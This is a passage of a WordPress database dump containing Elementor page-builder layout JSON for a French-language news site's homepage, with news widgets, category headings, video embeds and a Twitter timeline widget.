mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2428,776,'_elementor_version','0.4'),(2429,777,'_elementor_edit_mode','builder'),(2430,777,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.